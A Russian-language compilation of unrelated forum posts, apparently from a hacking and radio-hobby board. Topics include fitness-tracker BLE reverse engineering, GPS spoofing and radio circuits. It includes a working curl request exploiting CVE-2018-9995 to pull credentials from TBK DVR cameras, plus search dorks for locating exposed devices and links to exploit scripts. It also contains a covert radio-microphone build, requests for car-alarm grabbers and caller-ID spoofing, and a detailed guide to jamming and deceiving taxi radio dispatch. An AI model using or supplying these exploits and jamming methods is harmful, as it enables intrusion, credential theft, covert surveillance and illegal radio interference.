Вышеуказанного списка вполне достаточно для начала работы с фитнес-трекером.

Также вам понадобятся два приложения для отладки BLE-устройства: анализаторпротоколов Wiresharkи BLE отладчик. Кроме того, нужно активировать опции разработчика в устройстве на базе Android(для любителей iOS придется поискать эквивалент в этой платформе).

Для начала нужно отключить MiBand2 от приложения телефона.

Посмотрим, какие службы и характеристики есть у нашего устройства. Открываем отладчик для BLE и запускаем сканирование. Должно появиться примерно следующее:

Рисунок 1: Перечень устройств доступных для подключения

MAC адрес устройства нам понадобится позже, поэтому лучше эту информацию где- то сохранить или записать. Подключаемся и смотрим перечень служб и характеристик.

Рисунок 2: Перечень служб устройства

Выполнив две простые операции, мы уже получили полезную информацию о нашем устройстве. Схожая функция доступна через командную строку при помощи утилит hcitool и gatttool.
Запуск сканирования из командной строки:

Code:Copy to clipboard

sudo hcitool lescan

Подключение к BLE устройство через Mac адрес и получение списка служб и дескрипторов:

Code:Copy to clipboard

sudo gatttool -b YOUR_MAC -I -t random
> connect
> primary
> char-desc

В некоторых случаях могут возникнуть проблемы. В том случае можно перезагрузить устройство или запустить следующую команду:

Code:Copy to clipboard

sudo hciconfig hci0 reset

Подготовка к сниффингу данных
Для сниффинга данных во время коммуникации телефона и BLE-устройства нужно включить Bluetooth-логи в настройках разработчика. Вначале необходимо включить настройки на Android-устройстве. Следуйте по шагам, описанным далее.
До Android 4.1 опции разработчика доступны по умолчанию. Начиная с версии 4.2, нужно сделать следующее:
1. Откройте раздел Settingsна Android-устройстве.
2. Выберите раздел System(только на устройствах с Android 8.0 и выше).
3. Прокрутите вниз и выберите Aboutphone.
4. Прокрутите вниз и тапните 7 раз на Buildnumber.
5. Возвратитесь к предыдущему разделу. Почти в самом низу должен появиться раздел Developeroptions.
Откройте настройки разработчика и включите опцию **«Enable Bleutooth HCI snoop log».Теперь все коммуникации между телефоном и любым внешним Bluetooth-устройством должны отражаться в файле btsnoop_hci.log. (на моем телефоне с **Android 7.0 логи находятся в /mtklog/btlog/btsnoop_hci.log).

Аутентификация
Теперь нужно выполнить следующие шаги для получения информации о том, как работает аутентификация (сопряжение).
1. Включите Bluetoothи HCI логи.
2. Выполните сопряжение устройства с приложением Xiaomi Android App.
3. Отключите Bluetooth.
4. Загрузите btsnoop_hci.logна компьютер.
5. Откройте файл в Wireshark.
6. Найдите первый запрос, имеющий отношение к протоколу ATT, с параметром Handle: 0x0055 (который связан с компаниейAnhui Huami Information Technology Co, выпускающей переносные устройства и владеющей брендом Xiaomi**).
Должно получиться примерно следующее:**

Рисунок 3: Содержимое логов с Android-устройства

Выделенный запрос – первый этап аутентификации.
Как видно из рисунка выше, обрабатываются следующие значения UUID:

• Pairing device
  Main service UUID
  0000fee1-0000–1000–8000–00805f9b34fb

• Auth Characteristic (Char) UUID
  00000009–0000–3512–2118–0009af100700

• Notification descriptor (Des) handle

0x2902 (всегда неизменный)
Аутентификация состоит из следующих шагов:

1. Настройка auth-уведомлений (для получения ответа) посредством отправки двухбайтового запроса \x01\x00в Des.
2. Отправка 16-байтового ключа шифрования в Char с командой и добавление двух байт \x01\x00 + KEY.
3. Запрос случайного ключа с устройства с командой посредством отправки двух байт \x02\x00 в Char.
4. Получение случайного ключа от устройства (последние 16 байт).
5. Шифрование этого случайного номера при помощи 16-байтового ключа, используя алгоритм шифрованияAES/ECB/NoPadding(из Crypto.Cipher import AES) и обратная отправка в Char (\x03\x00 + закодированная информация).

Данные в режиме реального времени
Процесс аутентификации Auth оказался чуть сложнее, и появились некоторые проблемы. Мониторинг частоты сердцебиений отключался через 15 секунд. Ниже показан перечень полученных значений UUID:

• Hardware service (HRDW) UUID
  0000fee0–0000–1000–8000–00805f9b34fb

• Heart Monitor Service (HMS) UUID
  0000180d-0000–1000–8000–00805f9b34fb

• Heart Rate Measure Characteristic (HRM) UUID
  00002a37–0000–1000–8000–00805f9b34fb

• Heart Monitor Control Characteristic (HMC) UUID _
  00002a39–0000–1000–8000–00805f9b34fb_

• Sensor Characteristic (SENS) UUID** _
  00000001–0000–3512–2118–0009af100700_**

• Notification descriptor (DES) handle
  0x2902(всегда неизменный)

Выполняются несколько стандартных операций:

1. Отключение текущего мониторинга сердцебиений. Отправка запроса \x15\x02\x00 к HMC _для одноразовых измерений. Отправка запроса**\x15\x01\x00** к_HMC для непрерывных измерений.2.
2. Разрешение сырых данных от гироскопа и измерителя сердцебиений посредством отправки команды \x01\x03\x19 к SENS
3. _Включение уведомлений для HRMпосредством отправки запроса**\x01\x00** к _DES
4. _Начало непрерывных измерений сердцебиения посредством отправки запроса**\x15\x01\x01** к _HMC
5. Отправка команды\x02 к SENS (не очень понятно, зачем нужна эта команда)
6. Затем в процессе получения уведомлений каждый 12 секунд нам нужно отсылать пинг со значением \x16 к HCM

Парсинг данных
Далее нужно было разобраться, как распаковать информацию, приходящую с устройства, для последующего парсинга.
Некоторую часть данных можно распарсить из логов, некоторую - нельзя.

Рисунок 4: Ответ от устройства с текущим временем

Поиск правильных пакетов и изучение системы кодирования может отнять некоторое время. В моем случае я попытался найти похожие байты в пакетах рядом с друг с другом. Некоторые байты повторяются внутри пакета.

Code:Copy to clipboard

Raw heart: 02102d8c348c448c458c3d8c428c488c 16
Raw heart: 0218468c418c3d8c468c3f8c398c418c 16
Realtime heart: 93
Raw heart: 0220408c448c3f8c428c498c3c8c3d8c 16
Raw heart: 02283d8c398c488c3e8c468c488c328c 16
Realtime heart: 99
Raw heart: 0230438c408c378c3a8c318c458c388c 16
Realtime heart: 102
Raw heart: 02404f8c408c458c428c4d8c558c4d8c 16
Raw heart: 02483e8c3b8c3f8c348c398c318c428c 16
Realtime heart: 98
Raw heart: 02504c8c428c5e8c4f8c588c498c558c 16
Raw heart: 0258478c458c3c8c4e8c3f8c468c4d8c 16
Realtime heart: 100
Raw heart: 0260518c4d8c4f8c4b8c4f8c528c458c 16
Raw heart: 0268408c3f8c538c4d8c408c548c598c 16
Realtime heart: 102
Raw heart: 0278418c508c4e8c548c588c468c498c 16
Raw heart: 0280368c328c2e8c3c8c338c308c3f8c 16
Realtime heart: 101

Здесь можно заметить четкий повторяющийся шаблон 368c328c2e8c3c8c338c308c3f8cв пакете размером 16 байт. Если мы распакуем с учетом, что каждое измерение представляет собой беззнаковый короткий тип размером 2 байта, то получим 7 непосредственных измерений от сенсора сердца.
Также видно, что второй байт просто увеличивается и связан, как я думаю, с временной разницей между измерениями (ответами).

Code:Copy to clipboard

Raw gyro: 01de49ffd9ff3c004cffd8ff3b004dffdcff4400
Raw gyro: 01df4cffd6ff44004dffd8ff40004cffd1ff4700
Raw gyro: 02e1103231323d3274328e329632af32c732cf32
Raw gyro: 01e34fffd7ff56004bffc7ff590049ffccff4c00
Raw gyro: 01e443ffccff43004effcdff40005bffd4ff4c00
Raw gyro: 01e558ffc9ff5f005effbfff66005fffb0ff5900
Raw gyro: 01e64cffacff60005cffa7ff410066ffc9ff4600
Raw gyro: 01e760ffdcff4b0051ffe4ff4f0034ffdeff5300
Raw gyro: 02e903365c36813663361036543688374139fe3a
Raw gyro: 01eb4bffc3ff50004fffc1ff430047ffbbff4100
Raw gyro: 01ec3effb2ff3c0050ffbfff560047ffccff7300
Raw gyro: 01ed4fffe0ff78005cffebff8e0056fff6ff8300
Raw gyro: 01ee7efffbffa1008bff0f00bc00b1ff1900b800
Raw gyro: 01ef9bff0c00d10095fff3ffd600b7ff0800df00
Raw gyro: 02f12445314600479e473348aa481c499749244a
Raw gyro: 01f3c3ff1600fe00beff1800f200a6ff0800e700
Raw gyro: 01f4a9fff8ffd300a7fff3ffd700a9fff1ffdf00
Raw gyro: 01f5b1fff8ffe800b4fff1fff700acfffcffef00
Raw gyro: 01f67ffff7ffc0006bfff4ffb00078ffe9ffb600
Raw gyro: 01f786ffecffc0006ffff0ffbc0060fff1ffc000
Raw gyro: 02f9ca4cbb4c784c964ca84c784c854c444c1b4c
Raw gyro: 01fb7cff0f00bb007eff2700ae0083ff30009800
Raw gyro: 01fc79ff1800b00076ff0f00bc0068ff0900d900
Raw gyro: 01fd78ff07000c01f6fffbff19011c000b00f600
Raw gyro: 01fe4b001100d30054000700c3004300efffeb00
Raw gyro: 01ff1f00d0ff1701fbffe8ff1b01e3ffffff1101
Raw gyro: 0201214b014bec4ad04aba4acb4abe4aba4abd4a
Raw gyro: 0103efffecfffc00e3fff3fff300defff3fffc00
Raw gyro: 0104e3fff0fff400e6ffefff0301dbffe9ff0c01
Raw gyro: 0105e3fff0ff0301e6ffe6fffc00dcffecfffc00
Raw gyro: 0106dffff0fff700dbffeefff600d6fff0fff400
Raw gyro: 0107dfffecffff00e1fff0ff0301defff3fffc00

В случае с гироскопом ситуация оказалась чуть сложнее. Но я думаю, что упаковка должна выполняться схожим образом, как и для данных о частоте сердцебиения. Однако здесь у нас 3 измерения знакового типа для каждой оси гироскопа, а сам пакет размером 20 байт. Таким образом, данные от всех сенсоров укладываются не в 12, а в 3 измерения по осям x, y, z. Первые 2 байта играют ту же роль, что и в предыдущем случае. В итоге моя гипотеза оказалась верной.

Код
Код, как обычно, можно найти на Githubс примером использования. Ничего сложного нет, и я решил подробно не рассматривать этот момент в статье.

Эксплуатация DVR камер

Серия устройств TBK DVR4104 и DVR4216, а также сторонних производителей на базе этих версий уязвимы к обходу проверки подлинности и
с помощью простого заголовка Cookie: uid = admin можно извлекать учетные данные. Главная проблема заключается не в уязвимости, в подобном оборудовании, они довольно примитивны, а в большом количестве камер подключенных к сети. TBK предлагает множество версий оборудования с цифровым лейблом и ребрендингом оборудования IoT DVR. Многие бренды и интернет-продавцы рекламируют устройства под разными именами, и для некоторых пользователей их может быть сложно обновить.

Проэксплуатировать уязвимость можно отправив запрос:
curl "[URL]http://target/device.rsp?opt=user&cmd=list[/URL]" -H "Cookie: uid=admin"

В ответе вы получите заветные логи и пароль.

Найти камеры можно по доркам:
inurl: login.rsp
intitle: ‘DVR Login’
html: ‘/login.rsp’
‘Server: GNU rsp/1.1’

Для просмотра видео необходим IE с установленным плагином DVR.

Сплойты на bash, python


[ GitHub - Cyb0r9/DVR-Exploiter: DVR-Exploiter a Bash Script Program

Exploit The DVR's Based on CVE-2018-9995 ](https://github.com/TunisianEagles/DVR-Exploiter.git)

DVR-Exploiter a Bash Script Program Exploit The DVR's Based on CVE-2018-9995 - Cyb0r9/DVR-Exploiter

github.com

[ GitHub - ezelf/CVE-2018-9995_dvr_credentials: (CVE-2018-9995) Get DVR

Credentials ](https://github.com/ezelf/CVE-2018-9995_dvr_credentials)

(CVE-2018-9995) Get DVR Credentials. Contribute to ezelf/CVE-2018-9995_dvr_credentials development by creating an account on GitHub.

github.com

Статья представлена исключительно в ознакомительных целях, ни одна ссылка не является рекламой.

Если вам нужно, чтобы телефон и программы на нём думали, будто вы находитесь в другом, отличном вашего реального расположения месте, то эта статья расскажет вам, как спуфить GPS. Вы можете «телепортироваться» в любое место на планете Земля, установив фальшивое значение GPS, и любое приложение будет думать, что вы находитесь именно там.
Среди программ, которые используют текущее значение GPS и которые можно обмануть по этой инструкции, могут быть:

• различные сервисы, показывающие какие-либо объекты непосредственно рядом с вами
• камера, которая запишет фальшивые значения расположения в метаданные фотографии
• приложения, показывающие ваши координаты или место на карте
• социальные сети, с функцией «чек-ин» — вы можете отметиться на любой точке земного шара

Между прочем, для этого нам не нужны права рута!

Мы проверили работоспособность данного метода на Android 4.2.1. В целом метод очень простой и после настройки позволяет задавать своё фейковое местоположение в телефоне буквально двумя кликами.

Включение опций разработчика
Нам нужно разрешить прошивке использовать фальшивое расположение – этой опции нет в обычном меню настроек, чтобы добраться до этой опции нужно активировать режим «Разработчика». Для этого в настройках перейдите в пункт «О телефоне» (обычно это самый нижний пункт в Настройках) и семь раз нажмите на пункт «Номер сборки»:

После первых двух нажатий появиться маленькое всплывающее окошечко с надписью: «Вы в … шагах от того, чтобы стать разработчиком».

Пункт «О телефоне», в зависимости от модели телефона, может называться «Об устройстве», также может быть дополнительный промежуточный пункт «Информация о программном обеспечении» — именно в нём нужно искать «Номер сборки».
Теперь в главном меню настроек у вас появится пункт «{ } Для разработчиков»:

Зайдите в него и поставьте галочку на пункте «Фиктивные местоположения»:

В настройках телефона отключите GPS датчик:

Программа для подмены сигнала GPS
Установите программу Fake GPS location (есть в Play Маркет).
Откройте её и выберите любое местоположение на карте:

Вы можете использовать поиск для ввода желаемого местоположения, либо передвигать карту, чтобы найти то, что вам нужно:

Когда установите отметку, нажмите на зелёную кнопку внизу правой части экрана.

Программа сразу начнёт работать, и сама свернётся. К ней можно получить доступ в списке недавно запущенных приложений, кликнув на её иконку или из шторки:

Чтобы остановить подделку своего местоположения, нажмите на кнопку Pause в шторке, либо зайдите в программу и нажмите кнопку внизу левой части экрана:

Во время работы программы, все приложения на телефоне будут думать, что вы именно там, куда вы указали на карте. В соответствующих программах и сервисах, вы можете поискать людей или достопримечательности в любом районе.

Удаление пункта «Для разработчиков» из меню
Удаление опций Для разработчиков возможно, но только для определённых телефонов. Для большинства моделей единственным вариантом наверняка удалить этот пункт из меню является сброс телефона до заводских настроек.

Определённые модели (например, HTC One (M8) со стоковым Android) позволяют удалить этот пункт из опций без полного сброса, владельцам, например, Galaxy S5 и LG G3 придётся либо жить с этим пунктом или делать полный сброс (wipe) телефона.

Перейдите в Настройки->Приложения->Настройки и нажмите на «Стереть данные». Этот метод может работать на разных телефонах и планшетах.

Чтобы определить место, где сделана фотография, вы можете воспользоваться этим бесплатным сервисом .

автор: Dark Space

раздобыл недавно усилитель ламповый 1971года выпуска рабочий,выдаёт так что если подключить к колонкам в спальне то даже на кухне будет отлично слышно.Но у меня проблема усилок сильно дрибижжит и как ето исправить я незнаю.подскажите.

охота переделать данный adsl модем
как это возможно сделать?
в основном требуется находящейся в нём wi-fi
так чтобы он мог соединиться с точкой доступа в сеть
и потом раздавал его посредствам lan или того же wi-fi
конечно wi-fi было бы лучше?
есть какие соображения?

Добрый день
Интересует инфа про грабер сигнализаций для авто. Если есть варианты то: Инструкции, схемы, звуки - возможно готовые примеры (описание), с чем столкнулись при сборе.
Спасибо

саба собственно в чем надо подключить муз центр модели Technics SЕ-HD 560
к компу короче когда я его подключаю он не хочет проигровать музыку с компа а комп его определяет как наушники в чем может быть проблема???

Умный дом своими руками. Программируем Микроконтролеры.
Добавлено в [time]1224116414[/time]
Микроконтроллер — микросхема, предназначенная для управления электронными устройствами. Типичный микроконтроллер сочетает в себе функции процессора и периферийных устройств, может содержать ОЗУ и ПЗУ. По сути, это однокристальный компьютер, способный выполнять простые задачи. Использование одной микросхемы, вместо целого набора, как в случае обычных процессоров, применяемых в персональных компьютерах, значительно снижает размеры, энергопотребление и стоимость устройств, построенных на базе микроконтроллеров.
Микроконтроллеры являются основой для построения встраиваемых систем, их можно встретить во многих современных приборах, таких, как телефоны, стиральные машины и т. п. Бо́льшая часть выпускаемых в мире процессоров — микроконтроллеры.

Интересует сабж.
На что нужно обратить внимание при покупке. Что они реально дают? Можно ли скажем слушать соседей через балкон или еще что. Пробивает ли стены и если да то какой толщины.

http://www.podrobnee.ru/se/super-uho-plus-100.php
пример.

Народ никто не видел примочек к гитарам (Схемы)
Если кто видел можете поделиться ссылками... :crazy:

Есть возможность подмены номера мобильного на номер того, кому звонишь. www.talkety.com (а то на всех форумах дружественніх уже запостил, запостю и сюда )

Устройство содержит минимум необходимых деталей и питается от батарейки для электронных часов напряжением 1,5 В. При столь малом напряжении питания и потр**ляемом токе 2-3 мА сигнал этого радиомикрофона может приниматься на удалении до 150 м. Продолжительность работы около 24 ч.
Задающий генератор собран на транзисторе VT1 типа КТ368, режим работы которого по постоянному току задается резистором R1. Частота колебаний задается контуром в базовой цепи транзистора VT1. Этот контур включает в себя катушку L1, конденсатор С3 и емкость цепи база-эмиттер транзистора VT1, в коллекторную цепь которого в качестве нагрузки включен контур, состоящий из катушки L2 и конденсаторов С6, С7. Конденсатор С5 включен в цепь обратной связи и позволяет регулировать уровень возбуждения генератора.
В автогенераторах подобного типа частотная модуляция производится путем изменения потенциалов выводов генерирующего элемента. В нашем случае управляющее напряжение прикладывается к базе транзистора VT1, изменяя тем самым напряжение смещения на переходе база-эмиттер и, как следствие, изменяя емкость перехода база-эмиттер. Изменение этой емкости приводит к изменению резонансной частоты колебательного контура, что и приводит к появлению частотной модуляции. При использовании УКВ приемника импортного производства требуемая величина максимальной девиации несущей частоты составляет 75 кГц (для отечественного стандарта - 50 кГц) и получается при изменении напряжения звуковой частоты на базе транзистора в диапазоне 10-100 мВ. Именно по этому в данной конструкции не используется модулирующий усилитель звуковой частоты. При использовании электретного микрофона с усилителем, например, МКЭ-3, МКЭ-333, МКЭ-389, М1-Б2 "Сосна", уровня сигнала, снимаемого непосредственно с выхода микрофона, оказалось достаточно для получения требуемой девиации частоты радиомикрофона. Конденсатор С1 осуществляет фильтрацию колебаний высокой частоты. Конденсатором С7 можно в небольших пределах изменять значение несущей частоты. Сигнал в антенну поступает через конденсатор С8, емкость которого специально выбрана малой для уменьшения влияния возмущающих факторов на частоту колебаний генератора. Антенна сделана из провода или металлического прутка длинной 60-100 см. Длину антенны можно уменьшить, если между ней и конденсатором С8 включить удлинительную катушку L3 (на рис. не показана). Катушки радиомикрофона бескаркасные, диаметром 2,5 мм, намотаны виток к витку. Катушка L1 имеет 8 витков, катушка L2 - 6 витков, катушка L3 - 15 витков провода ПЭВ 0,3. При настройке устройства добиваются получения максимального сигнала высокой частоты, изменяя индуктивности катушек L1 и L2. Подбором конденсатора С7 можно немного изменять величину несущей частоты, в некоторых случаях его можно исключить совсем.

После нехиртой переделки получаем ВОТ такой красивый шлейф

Что нам понадобится:

Во-первых острый перочиный нож, во-вторых парочка зажимов для последующей скрепки кабеля(можно также использовать скотч или изоленту), а в-третьих есстесственно сам шлейф

Очень простая и самое главное нужная переделка.

Полную версию смотрим тут http://www.alser.kz/articles/02082002.asp

народ кароче был у нас один пацан в доме жил так он чёта там химичил с радио эликтроникой вобщим он зделал такую штуку каторая убивает телы особенно импортные может кто знает как ето зделать кароче я её видил но неспрашивал что за она и ваще я тока патом разобрался что она делает кароче он мне её недовал ну мне было лет 14 и я таким неинтерисовался так вобщим когда он врубал эту платку с онной пальчикавой батарейкай в радиусе метров так 30-40 все телы начинали шипеть растраиваться и вканце канцов вырубаться и там вроде платка згарала в теле кароче в нашем доме от этой платки пострадало телов 20 точно так как я тока и видил в окно вывазили сломаные телы в ремонтные мастерские и диагнас был у всех телов один и тотже горела палатка каторая отвечала за прием и обработку нащёт кампов незнаю у меня его тогда небыло (так вот может кто знает как замутить такую штуку????) :help:

Программный ремонт сотовых телефонов...

Предлагаемая книга является уникальной в своем роде - аналогов ей пока нет не только в России, но и в странах СНГ и Балтии. В пособии собраны материалы по программированию более 200 моделей сотовых телефонов торговых марок [New$paN] Siemens, Motorola, Nokia и LG. Кроме описания методики программирования телефонов с помощью наиболее распространенных программных средств, в книге приводятся схемы интерфейсных кабелей (Data-кабелей), различных видов программаторов-боксов, а также назначение выводов системных разъемов телефонов. Для некоторых моделей приводятся описания тестовых режимов, рассматриваются характерные дефекты аппаратов и их устранение.
В книге приводятся все необходимые начальные сведения по архитектуре рассматриваемых моделей телефонов, распределению их памяти и другим аппаратным особенностям. Благодаря этому, она может использоваться в качестве учебного пособия при подготовке специалистов по ремонту сотовых телефонов.

Скачать|РапидШара

а также

Собственно сабж-это система экспресс-оплаты мобилы, инета, вебмани Кто знает любые баги, способы как обмануть аппарат, войти в сервисное меню, отпишитесь...

З.Ы.

Кто знает как подключить автомагнитолу при помощи такого прибора?

Как этим прибором найти нужные провода:олонок провод питания и земли?Помогите плизз.

Незнаю как у вас,но на Горьковской железной дороге в вагонах электричек виит электронное табло на котором отображается различные текст и время.
Вопрос: Как ведётся управление надписями и можно ли заставить табло вертеть нужную тебе надпись.
З.Ы
Не надо писать купи рекламу и всё будет=)

Проблема в том что у моего родственника спаренный телефон... И его соседи постоянно сидят в инете что до него невозможно дозвониться... Как мне из заглушить?

Люди, вот такой вопрос - какая распайка на Миниджэк - разъем на наушник ?

или как правельно соединить с розочкой ?

Здесь я буду выкладывать книги и журналы для радиолюбителей.

Журнал "Радио"
Есть все выпуски аж с 1970 года
Смотрим и качаем тут
Скачать журнал "Радио" №6 за 2005 год

Есть такая проблема: очень низкая скорость устойчивого коннекта при самой совершенной АТС в городе (до дома вообще, говорят, оптоволокно идёт!).
Пока методом "научного тыка" и анализа модемной статистики установлено, что наиболее вероятной причиной столь низкой скорости является плохой кабель от "входа в дом" до телефонной розетки RJ11(кажется так) либо наведённые токи от проводов 220в (для ламп в подъезде/коридоре и звонков) - они близко и их дофига.

Какие есть предложения или решения, кроме:
1. Проложить самому коаксиал.
2. Обернуть чистую "двойную медную жилу" фольгой по всей длине.

С небольшим обоснованием (Я - РадиоФак 4 курс)

Повышенный интерес к изготовлению радиотелефонов сдерживается сложностью схемных и технических решении, обусловленных принципом работы. Например радиотелефон "РТФ-92", опубликованный в [1], сложен как в изготовлении, так и в наладке, требует изготовления большого количества катушек и трансформаторов

При разработке предлагаемого радиотелефона ставилась задача создать радиотелефон, доступный для изготовления начинающим радиолюбителям. Метод тонального радиоуправления не позволяет это сделать, поэтому в основу работы данного радиотелефона положен метод прерывания несущей. Это позволило максимально упростить схему и обеспечить следующие достоинства:

- работу в дуплексном режиме (можно одновременно говорить и слушать);

- высокое качество сигнала (широкополосная ЧМ модуляция);

- питание стационарного аппарата полностью от телефонной линии;

- высокую экономичность радиотелефонной трубки (за :чет простоты схемы);

- простоту элементной базы и возможность наращива-ня мощности передатчиков.

Рассмотрим работу радиотелефона.

Радиотелефонная трубка (рис.1) находится в режиме дерного приема, передатчик ее выключен. В стационарном телефонном аппарате (рис.2) работает также один тлько приемник. Телефон с определителем номера находится в режиме автоподнятия трубки. При поступлении вызова от абонента автоматически включается передатчик стационарного аппарата и передает вызов на радиотелефонную трубку. После приема вызова включается передатчик радиотелефонной трубки и система готовa к работе в дуплексном режиме.

При вызове со стороны радиотелефонной трубки включается питание передатчика тумблером S1"Деж.реж.". Сигнал несущей принимается приемником стационарного аппарата, при этом в нем загорается светодиод точной настройки. В дежурном режиме транзистор VT1 закрыт. Напряжением со светодиода транзистор открывается, при этом на резисторе R5 возникает падение напряжения, которое питает передатчик стационарной части. При наборе номера на радиотелефонной трубке происходит прерывание питания (и соответственно несущей) на число раз, соответствующее цифре. Соответственно столько же раз потухает светодиод, напряжение с которого коммутирует транзистор VT1. Таким образом происходит набор номера в линию. При передаче информации низкочастотный сигнал с выхода УНЧ приемника поступает на базу VT1 для модуляции. При отсутствии телефона с определителем номера, который включает режим автоподнятия трубки, можно установить электронное реле, осуществляющее автоподнятие.

Выбор приемников и передатчиков для радиотелефона. Выбор приемника зависит от возможностей и квалификации радиолюбителя. Основной критерий для приемника позволяют, элементы управления и транзистор VT1 можно разместить в самом приемнике. Можно также установить в корпусе приемника гнездо, и на него вывести управляющие напряжения, а саму схему управления собрать в отдельном корпусе. В этом варианте приемник можно в любой момент отсоединить и использовать по прямому назначению.

Если будет использоваться импортный приемник (в них обычно применяется одна специализированная микросхема), а также при отсутствии принципиальной схемы приемника точку, откуда снимается напряжение точной настройки, можно найти экспериментально тестером по увеличению постоянного напряжения при приеме сигнала несущей частоты передатчика радиотелефонной трубки.

Для упрощения конструкции передатчик стационарного аппарата (рис.4) питается от телефонной линии. Мощность его ограничена мощностью телефонной сети и зависит от падения напряжения на резисторе R5. Величина R5 подбирается таким образом, чтобы при поднятой телефонной трубке на нем падало 15...18 В (транзисторы должны слегка греться). Дальность действия

приемника радиотелефонной трубки — ток покоя, так как от него зависит время непрерывной работы. Экономичный приемник с низковольтным питанием можно собрать на микросхеме К174ХА34 по схеме, приведенной на рис.3. При ее отсутствии можно использовать готовый миниатюрный приемник с выходом на телефон. Размеры платы таковы, что позволяют свободно установить ее в трубке радиотелефона. Такой же приемник, но на диапазон 65...74 МГц, можно использовать и для стационарного аппарата. Приемник потр**ляет небольшой ток, поэтому его можно питать от телефонной линии. Но так как размеры приемника для стационарного аппарата некритичны, для этой цели можно использовать переносной приемник со встроенным блоком питания типа "Океан".

Порядок доработки приемника стационарного аппарата. Для управления транзистором VT1 с приемника используются два сигнала: напряжение точной настройки — для набора номера в линию, и напряжение низкой частоты — для модуляции. Если размеры радиотелефона в большой степени определяется мощностью передатчика радиотелефонной трубки, а та, в свою очередь, зависит от напряжения питания. Если не требуется большая дальность, для передатчика можно использовать питание приемника. Выбор источника напряжения и его величины определяется размерами радиотелефонной трубки

Принципиальная схема передатчика радиотелефонной трубки приведена на рис.5. Задающий генератор передатчика выполнен на транзисторе VT2 типа КПЗОЗ. Частота генерации определяется элементами L1, СЗ, С5, VD2. Частотная модуляция осуществляется путем подачи модулирующего напряжения звуковой частоты на варикап VD2 типа КВ109. Рабочая точка задается напряжением, поступающим через резистор R2 со стабилизатора напряжения. Стабилизатор включает в себя генератор стабильного тока на полевом транзисторе VT1, стабилитрон VD1 и конденсатор С2. Усилитель мощности выполнен на транзисторе VT3. Режим работы усилителя задается резистором R4.

Дроссели L2 и L3 могут быть любыми с индуктивностью 10...150 мГн. Катушки L1 и L4 наматываются на полистирольных каркасах диаметром 5 мм с подстроенными сердечниками 100 ВЧ или 50 ВЧ. Количество витков — 3,5с отводом от середины, шаг намотки — 1 мм, провод — ПЭВ 0,5. Настройка заключается в установке необходимой частоты генератора конденсатором С5, получении максимальной мощности путем подбора сопротивления резистора R4 и подстройке частоты контура конденсатором С 10.

В передатчике стационарного аппарата резистор R5 включается в разрыв одного из проводов телефонной сети. При снятии трубки телефонного аппарата или включении режима автоподнятия в цепи появляется ток, который в зависимости от типа аппарата и состояния линии находится в пределах 10...35 мА. Этот ток, протекая через резистор R5, вызывает на нем падение напряжения порядка 15... 18 В, которое питает передатчик. Автогенератор передатчика собран по обычной двухтактной схеме, на транзисторах VT1 и VT2. Частотная модуляция происходит за счет изменения напряжения в линии и, как следствие, изменения напряжения на базах транзисторов. Частота задается параметрами контура L1, С5. Катушка L1 наматывается на полистирольном каркасе диаметром 5 мм и содержит 4 витка провода ПЭВ 0,5 мм с отводом от середины. Катушка L2 наматывается поверх L1 и имеет 2 витка того же провода. Настройка производится при занятой телефонной линии путем подстройки контура L1, С5.

Радиотелефон обеспечивает дальность связи в пределах 300 метров, но при установке дополнительных усилителей мощности в радиотелефонную трубку и стационарную часть можно легко увеличить радиус действия до 10...15 км. При установке радиотелефона в автомобиль запитку радиотелефонной трубки лучше производить от бортового аккумулятора.

Кину на мыло схемы кому нада стучите в асю.

В связи с массовым обнаглением таксистов и их нашествием на диапазоны частот предназначенные исключительно для любительского использования необходимо с ними бороться, потому, как данное явление сильно мешает работе и позорит страну перед другими радиолюбителями мира.

Методы борьбы с таксобазами можно применять разные в зависимости от технической оснащенности и конкретных особенностей обстановки. Эти методы могут быть следующие:

1. Постановка радиопомех.

2. Дезорганизация работы.

Постановка радиопомех
Она может включать в себя несколько разных методик для разных случаев в отдельно взятой обстановке:
1. Если вы находитесь в одном городе с мешающим объектом.
В данном случае в зависимости от Вашего технического оснащения и эффективности работы Ваших антенн то месту, можно рекомендовать следующее:
- при достаточном запасе мощности (50-300 Вт) постановка несущей на неограниченное время +/- 5-7 КГц от мешающей станции. Лучший результат дает частотная модуляция с фоном 50 Гц и девиаций частоты 30 КГц. Наиболее хорошие результаты были достигнуты при передаче сигнала модулированного по чатоте "белым" шумом с отфильтрованной низкочастотной составляющей. Данная помеха внешне похожа на увеличение эфирного шума и длительное время остается неопознанной как помеха и поэтому наиболее эффективна. Как правило, такая помеха не похожа не на один из видов помех и при правильной постановке очень сильно завышает показания S-метров SB станций. Поэтому локализация источника помени крайне сложна, т.к. S-метры теряют свою калибровку и их показания случайны. Такая помеха не имеет точной частотной границы, занимая несколько каналов не поддается точной локализации по частоте. Ввиду ее широкополосности в ней не наблюдается наличия несущей, что делает ее еще более неузнаваемой длительное время.
- при избыточной мощности (300-1000 Вт и более) годится все выше перечисленное, но еще добавляются некоторые возможности - длительная работа в полосе пропускания входных цепей и цкпкй усилителей 1 ПЧ СВ станций (+/- 75 КГц), также работа в пораженных каналах базовых станций, на этих частотах допустимо все вышесказанное. Трансляця белого щума в пораженном канале внешне имеет такие же проявления как и отказ базовой станции.
Пораженными каналами являются частоты на которых прием сигнала происходит с небольшим ослаблением относительно основного канала. Для их поиска необходимо обзавестись (на время) таким типом станции который приемяется на таксобазе. Находятся по обычной методии при помощи поддерживающего нужный диапазон ГСС.
- при наличии оборужования малой мощности (1-15 Вт) возможно трансляция музыки либо ретрансляция местных радио- и телепередач в основном канале мешающей станции. Данное мероприятие необходимо производить на невидимые с земли антенны, желательно из случайных мест, территорий закрытых объектов и других зон недоступных для проезда автотранспорта. Это мероприятие призвано оглушать базу и не давать ей возможности принимать своих корреспондентов. Наилучшие результаты дает использование портативной станции в пределах здания в котором находится база, либо в окрестных кварталах.

ПРЕДУПРЕЖДЕНИЕ

Некоторые из данных мероприятий, особенно последнее за исключением использования портативной станции внутри здания, являются довольно легко локализуемыми, поэтому должны соблюдаться известные меры предосторожности. Самое главное: нельзя ничего говорить, а особенно ругаться в основном канале мешающей станции.

2. Если вы находитесь в другом городе и вражеская станция мешает Вам по проходу.
В данном случае эффективна трансляция в основном канале мешающей станции музыки, угроз, оскорблений и разных видов напоминаний, а также работа на передачу любым видом излучения, как можно дольше и с применением автоматических устройств.

Дезорганизация работы
Дезорганизация работы может осуществляться несколькими методами:
- Введение ложной информации базе, оно может осуществляться как по радио- так и по телефонному каналу.
